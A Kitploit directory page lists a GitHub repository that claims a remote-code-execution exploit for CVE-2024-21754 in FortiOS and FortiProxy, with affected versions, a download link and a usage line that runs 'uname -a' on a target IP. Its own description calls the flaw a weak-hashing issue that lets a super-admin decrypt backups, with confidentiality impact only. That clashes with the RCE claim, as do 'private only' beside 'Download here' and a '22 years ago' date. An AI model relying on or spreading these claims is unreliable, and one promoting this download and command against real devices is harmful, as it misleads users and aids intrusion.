Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2024-21754-Forti-RCE | Kitploit
Tools/GitHubGitHub/cybersecuritist/cve-2024-21754-forti-rce
Password CrackingVulnerability AnalysisExploitationWeb Application ExploitationNetwork Security
GitHubcybersecuritist/cve-2024-21754-forti-rce

CVE-2024-21754-Forti-RCE

View Repository
22 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

FortiOS and FortiProxy Password Hashing Vulnerability to RCE (CVE-2024-21754)

Overview

A critical vulnerability, classified as CVE-2024-21754, has been identified in FortiOS and FortiProxy versions up to 7.4.3, 7.2, 7.0, 6.4, and 2.0. This vulnerability, categorized under CWE-916, involves the use of password hashes with insufficient computational effort, potentially allowing a privileged attacker with super-admin profile and CLI access to decrypt backup files.

Details

  • CVE ID: CVE-2024-21754
  • Discovered: 2024-04-27
  • Published: 2024-06-27
  • Impact: Confidentiality
  • Exploit Availability: Not public, only private.

Vulnerability Description

The vulnerability lies in the password hashing mechanism employed by FortiOS and FortiProxy. The hashing algorithm used in vulnerable versions provides insufficient computational effort, making it susceptible to brute force attacks. An attacker with super-admin privileges and CLI access can exploit this weakness to potentially decrypt backup files containing sensitive information.

Affected Versions

FortiOS:

  • 7.4.3 and below
  • 7.2 all versions
  • 7.0 all versions
  • 6.4 all versions

FortiProxy:

  • 7.4.2 and below
  • 7.2 all versions
  • 7.0 all versions
  • 2.0 all versions

Running

To run exploit you need Python 3.9. Execute:

root@kitploit:~
python exploit.py -h 10.10.10.10 -c 'uname -a'

Contact

For inquiries, please contact [email protected]

Exploit:

Download here

image image

Download Tool